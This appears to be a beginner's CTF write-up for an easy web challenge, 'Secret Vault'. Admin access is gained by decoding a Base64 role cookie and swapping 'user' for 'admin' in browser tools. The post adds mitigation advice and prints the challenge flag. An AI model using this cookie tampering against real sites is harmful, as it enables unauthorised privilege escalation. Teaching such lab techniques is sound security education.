Post

CTF Writeup: Secret Vault - Easy Web Challenge

Posted Updated
By Salmon Kumar
1 min read
CTF Writeup: Secret Vault - Easy Web Challenge

Challenge Overview

Challenge Name: Secret Vault
Category: Web Exploitation
Difficulty: Easy
Points: 100

The challenge presented a simple login page with the message: “Only administrators can access the secret vault!”

Initial Reconnaissance

Upon visiting the challenge URL, I was greeted with a basic login form. I tried common credentials like admin:admin and admin:password, but none worked.

Key Observations

  • No source code provided
  • Simple HTML form with username and password fields
  • After failed login, redirected back to the same page
  • Interesting response header behavior

Discovering the Vulnerability

I opened the browser’s Developer Tools (F12) and examined the network traffic. After attempting to log in, I noticed something interesting in the Response Headers:

1

Set-Cookie: role=dXNlcg==; Path=/

The cookie value dXNlcg== looked like Base64 encoding due to the padding (== at the end).

Exploitation

I decoded the cookie value using CyberChef (or command line):

1

echo "dXNlcg==" | base64 -d

Output: user

So the application was setting my role as “user” in a cookie!

I encoded “admin” in Base64:

1

echo -n "admin" | base64

Output: YWRtaW4=

Using the browser’s Developer Tools:

  1. Open Application/Storage tab
  2. Navigate to Cookies
  3. Find the role cookie
  4. Change the value from dXNlcg== to YWRtaW4=
  5. Refresh the page

Success!

After refreshing with the modified cookie, the page displayed:

1
2

Welcome, Administrator!
Flag: CTF{c00k1es_4r3_n0t_s3cur3_st0r4g3}

Lessons Learned

This challenge demonstrates a critical security vulnerability:

  • Never trust client-side data: Cookies can be easily modified by users
  • Encoding is not encryption: Base64 is just encoding, not a security measure
  • Proper authentication: Use server-side sessions with cryptographically signed tokens
  • Cookie security flags: Use HttpOnly, Secure, and SameSite flags

Mitigation

The application should implement:

  1. Server-side session management
  2. Cryptographically signed cookies (e.g., JWT with proper secrets)
  3. Role verification on the server for every request
  4. Never store sensitive authorization data in client-accessible cookies

Tools Used

  • Browser Developer Tools (Chrome/Firefox)
  • Base64 decoder (CyberChef / command line)

Flag

1

CTF{c00k1es_4r3_n0t_s3cur3_st0r4g3}

Thanks for reading my first CTF writeup! Feel free to reach out if you have questions or want to discuss other challenges.

Happy Hacking!

CTF, Web Exploitation
ctf web cookies base64 beginner
This post is licensed under CC BY 4.0 by the author.

Trending Tags

base64 beginner cookies ctf web